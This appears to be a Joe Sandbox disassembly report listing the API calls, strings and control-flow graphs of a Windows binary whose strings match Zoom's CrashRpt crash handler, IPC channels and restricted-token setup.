                control_flow_graph 2198 cde020-cde05e call ce5365 call cdcac4 call cdcb6e 2205 cde060-cde07e call ce1e2c call cdcb8e call cdbfe5 2198->2205 2206 cde083-cde09c call cdcb6e 2198->2206 2205->2206 2212 cde124-cde156 call ce1f27 call cdcb8e call cdbfe5 2206->2212 2213 cde0a2-cde0f5 call ce1f27 call cdcf54 call ce2219 call cdcb8e call cdbfe5 2206->2213 2228 cde16d-cde171 2212->2228 2229 cde158-cde15e 2212->2229 2242 cde115-cde11f call cdbfe5 2213->2242 2243 cde0f7-cde108 call cdcac4 call cdbfe5 2213->2243 2233 cde17e-cde1bd call cdc00b call cdce9e call cdd6ba call cdcc86 2228->2233 2234 cde173-cde179 call cdcb6e 2228->2234 2229->2228 2232 cde160-cde16b call cdcac4 2229->2232 2244 cde10d-cde110 2232->2244 2258 cde1bf-cde1c8 call ce1f95 2233->2258 2259 cde1ca-cde1d2 call cdcc2e 2233->2259 2234->2233 2242->2212 2243->2244 2247 cde514-cde519 call ce5333 2244->2247 2264 cde1d6-cde215 call cdcb8e call cdbfe5 call cdcbea call ce0c75 2258->2264 2259->2264 2273 cde217-cde221 2264->2273 2274 cde223 2264->2274 2273->2274 2275 cde226-cde235 call cdbfe5 2273->2275 2274->2275 2278 cde23f-cde274 call ce0c20 CreateFileW call cdbfe5 2275->2278 2279 cde237-cde23a call ce0cdb 2275->2279 2285 cde286-cde294 CloseHandle 2278->2285 2286 cde276-cde281 call cdcac4 2278->2286 2279->2278 2287 cde296-cde2a0 call cdcb6e 2285->2287 2288 cde2a2-cde2c8 call ce0bc6 call cdcb8e call cdbfe5 2285->2288 2295 cde4fb-cde511 call cdbfe5 * 2 2286->2295 2296 cde2cd-cde2fb call ce0e1e call ce2106 call cf10dd 2287->2296 2288->2296 2295->2247 2310 cde2fd-cde30e call cdcac4 2296->2310 2311 cde313-cde31d 2296->2311 2318 cde4f0-cde4f6 call cdbfe5 2310->2318 2313 cde31f-cde328 call ce1f95 2311->2313 2314 cde32a-cde332 call cdcc2e 2311->2314 2321 cde336-cde372 call cdcb8e call cdbfe5 call cdcbea call ce0c75 2313->2321 2314->2321 2318->2295 2331 cde374-cde381 2321->2331 2332 cde383 2321->2332 2331->2332 2333 cde386-cde395 call cdbfe5 2331->2333 2332->2333 2336 cde39f-cde3c5 call ce0c20 LoadLibraryW call 
cdbfe5 2333->2336 2337 cde397-cde39a call ce0cdb 2333->2337 2343 cde3c7-cde3e9 call cdd28e call cdd095 LoadLibraryW 2336->2343 2344 cde3f2-cde411 call ce0e1e FreeLibrary call ce2016 2336->2344 2337->2336 2343->2344 2353 cde3eb-cde3f0 2343->2353 2354 cde41e-cde425 2344->2354 2355 cde413 2344->2355 2356 cde418-cde419 2353->2356 2357 cde467-cde46c call cdcb6e 2354->2357 2358 cde427-cde465 call cdc00b call cdce9e call ce20a0 call cdd6ba call cdbfe5 2354->2358 2355->2356 2360 cde569-cde56f call cdcac4 2356->2360 2362 cde471-cde4ca GetCurrentProcessId call cdcf54 * 2 call ce0eab call cdbfe5 2357->2362 2358->2362 2368 cde4df-cde4e2 2360->2368 2385 cde51c-cde538 call cdbfe5 call ce014e 2362->2385 2386 cde4cc-cde4da call cdcac4 call cdbfe5 2362->2386 2372 cde4e5-cde4eb call cdbfe5 2368->2372 2372->2318 2385->2368 2394 cde53a-cde562 call cdec9f 2385->2394 2386->2368 2397 cde574-cde57e call cded81 2394->2397 2398 cde564 2394->2398 2401 cde587-cde596 LoadLibraryW 2397->2401 2402 cde580-cde585 2397->2402 2398->2360 2403 cde598-cde5b9 GetProcAddress * 2 2401->2403 2404 cde5f0-cde606 call cdcac4 2401->2404 2402->2360 2405 cde5e9-cde5ea FreeLibrary 2403->2405 2406 cde5bb-cde5bd 2403->2406 2404->2372 2405->2404 2406->2405 2408 cde5bf-cde5d3 ?Unlock@CState@Cmm@@QAEXXZ 2406->2408 2408->2405 2411 cde5d5-cde5e1 ?Unlock@CState@Cmm@@QAEXXZ 2408->2411 2411->2405
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDE027
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                  • Part of subcall function 00CE1E2C: __EH_prolog3_GS.LIBCMT ref: 00CE1E36
                  • Part of subcall function 00CE1E2C: GetModuleFileNameW.KERNEL32(00000000,?,00000100,0000021C,00CDE068,?,00000028,00CDCA03,?,?,?,?,?,?,?,?), ref: 00CE1E61
                  • Part of subcall function 00CDBFE5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(144E8D40,F7F48D8D,00CDCB1F,00CDD788,00DFFB90,000762E8,00CDCB1F,00DFFB90,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDBFFE
                  • Part of subcall function 00CE1F27: __EH_prolog3.LIBCMT ref: 00CE1F2E
                  • Part of subcall function 00CE1F27: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000104,00000000,00000008,00CDE12E,?,?,00000028,00CDCA03,?,?,?,?,?), ref: 00CE1F6C
                • CreateFileW.KERNEL32(00000000,00120089,00000001,00000000,00000003,00000000,00000000,?,?,zCrashReport.exe,00000000,00000000,00000000,?,?,?), ref: 00CDE25E
                • CloseHandle.KERNEL32(00000000,?,zCrashReport.exe,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE287
                • LoadLibraryW.KERNEL32(00000000,?,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE3B0
                • LoadLibraryW.KERNEL32(?,00D34CD0,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE3DF
                • FreeLibrary.KERNEL32(00000000,?,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE401
                  • Part of subcall function 00CE2016: __EH_prolog3.LIBCMT ref: 00CE201D
                  • Part of subcall function 00CE2016: CoCreateGuid.OLE32(00000000,00000010,00CDE40F,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE2048
                  • Part of subcall function 00CE2016: UuidToStringA.RPCRT4(00000000,00000000), ref: 00CE2057
                  • Part of subcall function 00CE2016: RpcStringFreeA.RPCRT4(00000000), ref: 00CE2080
                • GetCurrentProcessId.KERNEL32(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE471
                • LoadLibraryW.KERNEL32(kernel32.dll,?,?,00000000,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00CDE58C
                • GetProcAddress.KERNEL32(00000000,SetProcessUserModeExceptionPolicy), ref: 00CDE59E
                • GetProcAddress.KERNEL32(00000000,GetProcessUserModeExceptionPolicy), ref: 00CDE5AD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE5C9
                  • Part of subcall function 00CE0BC6: __EH_prolog3.LIBCMT ref: 00CE0BCD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE5E1
                • FreeLibrary.KERNEL32(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE5EA
                  • Part of subcall function 00CE1F95: __EH_prolog3.LIBCMT ref: 00CE1F9C
                  • Part of subcall function 00CE1F95: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000008,00CDE324,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE1FDA
                Strings
                • The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag., xrefs: 00CDE160
                • Unspecified error. - Crash handler init, xrefs: 00CDE02E
                • Couldn't generate crash name GUID., xrefs: 00CDE413
                • Couldn't create crash report directory., xrefs: 00CDE4CC
                • GetProcessUserModeExceptionPolicy, xrefs: 00CDE5A4
                • CrashSender.exe is not found in the specified path., xrefs: 00CDE276
                • Application version is not specified., xrefs: 00CDE0F7
                • zCrashReport.exe, xrefs: 00CDE1ED
                • Couldn't set C++ exception handlers for current process., xrefs: 00CDE564
                • Couldn't load dbghelp.dll., xrefs: 00CDE3EB, 00CDE418
                • %s\CrashRpt\UnsentCrashReports\%s_%s, xrefs: 00CDE44B
                • CrashRpt%d.dll, xrefs: 00CDE19B
                • Missing language file or wrong language file version., xrefs: 00CDE2FD
                • dbghelp.dll, xrefs: 00CDE34D
                • crashrpt_lang.ini, xrefs: 00CDE2A2
                • Success. Crash handler init, xrefs: 00CDE5F0
                • kernel32.dll, xrefs: 00CDE587
                • Couldn't set C++ exception handlers for main execution thread., xrefs: 00CDE580
                • SetProcessUserModeExceptionPolicy, xrefs: 00CDE598
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                 • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3Library$File$Cmm@@FreeLoadModuleNameState@Unlock@$AddressCreateCriticalCurrentProcSectionString$CloseEnterGuidH_prolog3_HandleLeaveProcessThreadUuid
                • String ID: %s\CrashRpt\UnsentCrashReports\%s_%s$Application version is not specified.$Couldn't create crash report directory.$Couldn't generate crash name GUID.$Couldn't load dbghelp.dll.$Couldn't set C++ exception handlers for current process.$Couldn't set C++ exception handlers for main execution thread.$CrashRpt%d.dll$CrashSender.exe is not found in the specified path.$GetProcessUserModeExceptionPolicy$Missing language file or wrong language file version.$SetProcessUserModeExceptionPolicy$Success. Crash handler init$The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.$Unspecified error. - Crash handler init$crashrpt_lang.ini$dbghelp.dll$kernel32.dll$zCrashReport.exe
                • API String ID: 1722482660-1068515031
                APIs
                • OpenProcessToken.ADVAPI32(00000000,00000002,?,?,00000000,00000000), ref: 00CBE16B
                • GetLastError.KERNEL32 ref: 00CBE175
                • CloseHandle.KERNEL32(00000000), ref: 00CBE186
                • CloseHandle.KERNEL32(00000000), ref: 00CBE195
                • FreeSid.ADVAPI32(00000000), ref: 00CBE1A4
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CBE1B0
                • HeapFree.KERNEL32(00000000), ref: 00CBE1B7
                • FreeSid.ADVAPI32(00000000), ref: 00CBE1C6
                • CloseHandle.KERNEL32(?), ref: 00CBE1D8
                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 00CBE204
                • GetLastError.KERNEL32 ref: 00CBE20E
                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBE230
                • CreateWellKnownSid.ADVAPI32(0000006A,00000000,00000000,?), ref: 00CBE254
                • GetLastError.KERNEL32 ref: 00CBE25E
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00CBE27D
                • HeapAlloc.KERNEL32(00000000), ref: 00CBE284
                • CreateWellKnownSid.ADVAPI32(0000006A,00000000,00000000,?), ref: 00CBE2A9
                • CreateRestrictedToken.ADVAPI32(?,00000001,00000001,?,00000000,00000000,00000000,00000000,?), ref: 00CBE2D8
                • AllocateAndInitializeSid.ADVAPI32(00000008,00000001,00002000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBE2FE
                • SetTokenInformation.ADVAPI32(?,00000019,00000000,00000008), ref: 00CBE324
                Strings
                Similarity
                • API ID: HeapToken$CloseCreateErrorFreeHandleLastProcess$AllocateInitializeKnownWell$AllocDuplicateInformationOpenRestricted
                • String ID:
                • API String ID: 4290880295-3916222277
                APIs
                  • Part of subcall function 00CDC74F: __EH_prolog3_GS.LIBCMT ref: 00CDC756
                  • Part of subcall function 00CDC74F: GetCommandLineW.KERNEL32(00000034,00CDC868,00000000,00000000), ref: 00CDC76F
                  • Part of subcall function 00CDC74F: LoadLibraryW.KERNEL32(mmdevapi.dll,runaszvideo,00000000,00000000), ref: 00CDC7B0
                  • Part of subcall function 00CDC74F: CoInitializeEx.OLE32(00000000,00000002), ref: 00CDC7BC
                  • Part of subcall function 00CDC74F: CoCreateInstance.OLE32(00D4212C,00000000,00000017,A95664D2,?), ref: 00CDC7F2
                  • Part of subcall function 00CDC74F: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?), ref: 00CDC833
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,00000000,00000000), ref: 00CDC959
                • PathAppendW.SHLWAPI(?,\zoom\data\Zoom.us.ini), ref: 00CDC96F
                • GetPrivateProfileIntW.KERNEL32(Dump,type,00000000,?), ref: 00CDC98B
                • CreateThread.KERNEL32(00000000,00000000,00CDC470,00000000,00000004,?), ref: 00CDCA2B
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CDCA3F
                • GetCurrentThreadId.KERNEL32 ref: 00CDCA4A
                • ResumeThread.KERNEL32 ref: 00CDCA61
                  • Part of subcall function 00CDEC77: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000004,00CDCA8B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CDEC8B
                Strings
                • type, xrefs: 00CDC981
                • \zoom\data\Zoom.us.ini, xrefs: 00CDC963
                • Error allocating memory for crash handler., xrefs: 00CDC8D7
                • Dump, xrefs: 00CDC986
                • pInfo is NULL or pInfo->cb member is not valid., xrefs: 00CDCA8D
                • crInstallW finished: %d, xrefs: 00CDCA9C
                • Can't install crash handler to the same process twice., xrefs: 00CDC8AC
                • Success. crInstallW : %x, xrefs: 00CDC891
                Similarity
                • API ID: Thread$Create$Cmm@@CriticalCurrentPathSectionState@Unlock@$AppendCommandEnterEventFolderH_prolog3_InitializeInstanceLeaveLibraryLineLoadPrivateProfileResume
                • String ID: Can't install crash handler to the same process twice.$Dump$Error allocating memory for crash handler.$Success. crInstallW : %x$\zoom\data\Zoom.us.ini$crInstallW finished: %d$pInfo is NULL or pInfo->cb member is not valid.$type
                • API String ID: 3237976360-261031309
                APIs
                • _strcspn.LIBCMT ref: 00CD8658
                • _strcspn.LIBCMT ref: 00CD867A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(9FB8111D,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00D1B015,000000FF), ref: 00CD8697
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00D1B015), ref: 00CD86CD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD86E7
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000), ref: 00CD8800
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00D1B015), ref: 00CD881E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD884F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00CD8869
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CD887F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD8894
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD88B5
                • Concurrency::cancel_current_task.LIBCPMT ref: 00CD8CA2
                Similarity
                • API ID: Cmm@@State@Unlock@$_strcspn$Concurrency::cancel_current_task
                • String ID:
                • API String ID: 1478353410-0
                APIs
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEBEF
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC00
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC17
                • SetUnhandledExceptionFilter.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC2B
                • EnterCriticalSection.KERNEL32(?,?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC39
                • LeaveCriticalSection.KERNEL32(?,?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC40
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC58
                Strings
                • Can't destroy not initialized crash handler., xrefs: 00CDEBD2
                • Success., xrefs: 00CDEC64
                • Unspecified error - destroy., xrefs: 00CDEBBE
                Similarity
                • API ID: CloseCriticalHandleSection$EnterLeave$CurrentExceptionFilterThreadUnhandled
                • String ID: Can't destroy not initialized crash handler.$Success.$Unspecified error - destroy.
                • API String ID: 746703204-4224588828
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5C9CE
                • InitializeCriticalSection.KERNEL32(00000000,00000050,00C525B3,?,?,00000000,00000000), ref: 00C5CA34
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00000008,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5CA74
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • GetCurrentProcessId.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5CA7E
                • ?GenChannelName@CIPCChannelThread@ssb_ipc@@SAXABV?$CStringT@_W@Cmm@@IAAV34@@Z.RWSNDPQSKZ(00D334D0,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5CA89
                  • Part of subcall function 00C782A0: __EH_prolog3_GS.LIBCMT ref: 00C782A7
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z.RWSNDPQSKZ(00D334D8,00000000,?,000000FF), ref: 00C5CAEA
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(?), ref: 00C5CB01
                • ??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z.RWSNDPQSKZ ref: 00C5CB1E
                • ?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C5CB56
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C5CB6A
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00C5CB7C
                Similarity
                • API ID: Cmm@@$Channel$String$Thread@ssb_ipc@@$??0?$H_prolog3_$?_cstring_set@Channel@1@CriticalCurrentD@1@D@2@@std@@D@std@@DeallocateH_prolog3InitializeListener@Mode@1@Name@Now@ProcessSectionStart@State@Time@U?$char_traits@Unlock@V12@V34@@V?$allocator@V?$basic_string@
                • String ID:
                • API String ID: 840065177-0
                APIs
                • SetLastError.KERNEL32(0000000E,00000000,?), ref: 00C6291B
                • FindFirstFileW.KERNEL32(00000000,?,00000000,?), ref: 00C6292C
                • RemoveDirectoryW.KERNEL32(00000000), ref: 00C629A5
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000010,00000000), ref: 00C629B9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C629C6
                • HeapFree.KERNEL32(00000000), ref: 00C629CD
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C629D9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C629EE
                • HeapFree.KERNEL32(00000000), ref: 00C629F5
                • FindClose.KERNEL32(00000000), ref: 00C629FC
                • SetLastError.KERNEL32(00000057,00000000,?), ref: 00C62A09
                Similarity
                • API ID: Heap$Find$ErrorFileFreeLastProcess$CloseCmm@@DirectoryFirstNextRemoveState@Unlock@
                • String ID:
                • API String ID: 1089375185-0
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CDC756
                  • Part of subcall function 00CDA000: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CDA062
                  • Part of subcall function 00CDA000: VerSetConditionMask.KERNEL32(00000000), ref: 00CDA06A
                  • Part of subcall function 00CDA000: VerSetConditionMask.KERNEL32(00000000), ref: 00CDA072
                  • Part of subcall function 00CDA000: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00CDA09E
                • GetCommandLineW.KERNEL32(00000034,00CDC868,00000000,00000000), ref: 00CDC76F
                • LoadLibraryW.KERNEL32(mmdevapi.dll,runaszvideo,00000000,00000000), ref: 00CDC7B0
                • CoInitializeEx.OLE32(00000000,00000002), ref: 00CDC7BC
                • CoCreateInstance.OLE32(00D4212C,00000000,00000017,A95664D2,?), ref: 00CDC7F2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?), ref: 00CDC833
                Strings
                Similarity
                • API ID: ConditionMask$Cmm@@CommandCreateH_prolog3_InfoInitializeInstanceLibraryLineLoadState@Unlock@VerifyVersion
                • String ID: mmdevapi.dll$runaszvideo
                • API String ID: 3291905021-606725207
                Strings
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: $$'$/$/$Duplicate key: '$aration$in Json::Value::operator[](int index): index cannot be negative$keylength >= 2^30$name
                • API String ID: 118556049-37859427
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5CC96
                • ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z.RWSNDPQSKZ(?,00000000,?,000000FF), ref: 00C5CCFD
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(?,00C5CDE3), ref: 00C5CD14
                • ??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z.RWSNDPQSKZ ref: 00C5CD30
                • ?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ ref: 00C5CD60
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C5CD77
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00C5CD95
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C5CDBA
                Similarity
                • API ID: Cmm@@$Channel$State@StringThread@ssb_ipc@@Unlock@$??0?$?_cstring_set@Channel@1@D@1@D@2@@std@@D@std@@H_prolog3_Listener@Mode@1@Now@Start@Time@U?$char_traits@V12@V?$allocator@V?$basic_string@
                • String ID:
                • API String ID: 3385893932-0
                • Opcode ID: e37b5f03c730e844f26042a187450015d6a958149c2906fb359d4f6facff991b
                • Instruction ID: a46227144a252f352ca813ea14367792e42d79da61666b93a6dca09557524dde
                • Opcode Fuzzy Hash: e37b5f03c730e844f26042a187450015d6a958149c2906fb359d4f6facff991b
                • Instruction Fuzzy Hash: B641B375900304CFDF04DF98C4856ACBFB1EF44325F548159E815AB391CB749A8ACF65
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAC412
                  • Part of subcall function 00CAC2FE: __EH_prolog3_GS.LIBCMT ref: 00CAC308
                  • Part of subcall function 00CAC2FE: ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,000000BC), ref: 00CAC349
                  • Part of subcall function 00CAC2FE: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CAC3AA
                • CreateNamedPipeW.KERNEL32(?,40080003,00000000,00000001,00001000,00001000,00001388,0000000C), ref: 00CAC485
                • LocalFree.KERNEL32(?), ref: 00CAC491
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,40110000,00000000,?,?,00000068,00CAC0E6,?), ref: 00CAC4B6
                • ??0SBIPCMessage_Connect@@QAE@XZ.RWSNDPQSKZ ref: 00CAC4D1
                • GetCurrentProcessId.KERNEL32 ref: 00CAC4DA
                • ?SetMsgType@CmmInternelMsg@Cmm@@QAEXH@Z.RWSNDPQSKZ(?), ref: 00CAC50E
                • ??1?$CmmMessageTemplate_1@I@Archive@Cmm@@UAE@XZ.RWSNDPQSKZ(?), ref: 00CAC522
                  • Part of subcall function 00CABED2: __EH_prolog3_GS.LIBCMT ref: 00CABEDC
                  • Part of subcall function 00CABED2: GetCurrentProcess.KERNEL32(00000008,?,000000C8,00CAC44F), ref: 00CABEF4
                  • Part of subcall function 00CABED2: OpenProcessToken.ADVAPI32(00000000), ref: 00CABEFB
                Similarity
                • API ID: Cmm@@H_prolog3_Process$CreateCurrent$??1?$Archive@AssignConnect@@D@2@@std@@@D@std@@FileFreeInternelIos_base_dtorLocalMessageMessage_Msg@NamedOpenOther@?$PipeStringTemplate_1@TokenType@U?$char_traits@V12@V?$allocator@V?$basic_string@std::ios_base::_
                • String ID:
                • API String ID: 4240486610-0
                • Opcode ID: 48be006dc01c56e73befe7b8e452413a1c1d8be494689c5ab886b64317d66e36
                • Instruction ID: d83b0aaa4d2038bb6b70285c08f18411f9c36dc4618d76f0c8016be6614d920b
                • Opcode Fuzzy Hash: 48be006dc01c56e73befe7b8e452413a1c1d8be494689c5ab886b64317d66e36
                • Instruction Fuzzy Hash: E8316CB0D00309EEDB10EFA4CC95AEEBBB8AF19314F504529F425A7291DB70AA45DB24
                APIs
                Strings
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 7e75df8c0d3a879dcf9e5c21690d3e50f609d39f90d78732af125054fe155b48
                • Instruction ID: 01824ab35e723c9b92d1f2533d51d257871a7d3bd75658ccf20ba640f3da6f93
                • Opcode Fuzzy Hash: 7e75df8c0d3a879dcf9e5c21690d3e50f609d39f90d78732af125054fe155b48
                • Instruction Fuzzy Hash: 98C26F71E086288FDB25CF28DD407EAB7B5EB48315F1841EAD84DE7280E775AE818F51
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000C,00D0E4F3,00000000,?,00D0E68B,00000000), ref: 00D0E5D9
                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000), ref: 00D0E600
                • HeapAlloc.KERNEL32(00000000), ref: 00D0E607
                • InitializeSListHead.KERNEL32(00000000), ref: 00D0E614
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D0E629
                • HeapFree.KERNEL32(00000000), ref: 00D0E630
                Similarity
                • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                • String ID:
                • API String ID: 1475849761-0
                • Opcode ID: 716f91f16fc37a328361c481a8eba463c19df3cf02dee33d32ce8487aaf94a0c
                • Instruction ID: 2f619c588cee02668445d2a6cbca442d9ce572f4591225c163a62ba77510f983
